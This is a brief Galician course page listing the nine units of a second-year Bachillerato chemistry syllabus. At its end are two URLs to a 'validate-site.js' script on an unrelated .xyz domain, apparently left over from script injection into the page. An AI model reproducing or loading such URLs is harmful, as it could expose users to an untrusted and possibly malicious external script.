Química 2ºBACH

Material audiovisual complementario para o curso:

Unidade 1: Modelos atómicos.

Unidade 2: Clasificación dos elementos e propiedades periódicas.

Unidade 3: Enlace químico e propiedades das substancias.

Unidade 4: Cinética de reaccións.

Unidade 5: O equilibrio químico.

Unidade 6: Equilibrios heteroxéneos.

Unidade 7: Equlibrios ácido-base.

Unidade 8: Equilibrios redox.

Unidade 9: Química do carbono.

https://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52131x6966x&r=46

 

https://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52131x6966x&r=18

Advertisements